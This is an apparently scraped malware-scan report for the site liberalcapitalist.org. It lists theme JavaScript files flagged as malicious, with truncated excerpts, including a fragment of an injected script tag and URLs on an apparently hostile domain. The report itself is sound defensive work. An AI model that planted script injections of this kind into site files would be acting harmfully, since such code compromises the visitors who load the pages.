Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=liberalcapitalist.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.liberalcapitalist.org/ | 200 OK Content-Length: 32408 Content-Type: text/html | clean |
http://www.liberalcapitalist.com/liberalcapitalist/Themes/default/script.js?fin11 | 200 OK Content-Length: 15052 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var smf_formSubmitted = false; if (typeof(document.getElementById) == "undefined") document.getElementById = function (id) { return document.all[id]; } else if (!window.XMLHttpRequest && window.ActiveXObject) window.XMLHttpRequest = function () { return new ActiveXObject(navigator.userAgent.indexOf("MSIE 5") != -1 ? "Microsoft.XMLHTTP" : "MSXML2.XMLHTTP"); }; if (typeof(document.forms) == "undefined") document.forms = document. Antivirus reports:
| ||
http://www.liberalcapitalist.org/Themes/corto112_tp/styleswitch.js | 200 OK Content-Length: 3726 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(Name) { var re=new RegExp(Name+"=[^;]+", "i"); if (document.cookie.match(re)) return document.cookie.match(re)[0].split("=")[1] return null } function setCookie(name, value, days) { var expireDate = new Date() var expstring=(typeof days!="undefined")? expireDate.setDate(expireDate.getDate()+parseInt(days)) : expireDate.setDate(expireDate.getDate()-5) document.cookie = name+"="+value+"; expires="+expireDate.toGMTString()+"; path=/"; } function de ipt"></script>') /*/339810*/ Antivirus reports:
| ||
http://www.liberalcapitalist.com/liberalcapitalist/Themes/default/sha1.js | 200 OK Content-Length: 14362 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var hexcase = 0; var b64pad = ""; var chrsz = 8; function hex_sha1(s){return binb2hex(core_sha1(str2binb(s),s.length * chrsz));} function b64_sha1(s){return binb2b64(core_sha1(str2binb(s),s.length * chrsz));} function str_sha1(s){return binb2str(core_sha1(str2binb(s),s.length * chrsz));} function hex_hmac_sha1(key, data){ return binb2hex(core_hmac_sha1(key, data));} function b64_hmac_sha1(key, data){ return binb2b64(core_hmac_sha1(key, data));} function st Antivirus reports:
| ||
http://gfbnm2.com/flbvxy7w.php?id=6273263 | 404 Not Found Content-Length: 956 Content-Type: text/html | clean |
http://gfbnm2.com/test404page.js | 404 Not Found Content-Length: 956 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: liberalcapitalist.org
Result:
GET / HTTP/1.1
Host: liberalcapitalist.org
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: liberalcapitalist.org
Referer: http://www.google.com/search?q=liberalcapitalist.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: liberalcapitalist.org
Referer: http://www.google.com/search?q=liberalcapitalist.org
Result:
The result is similar to the first query. There are no suspicious redirects found.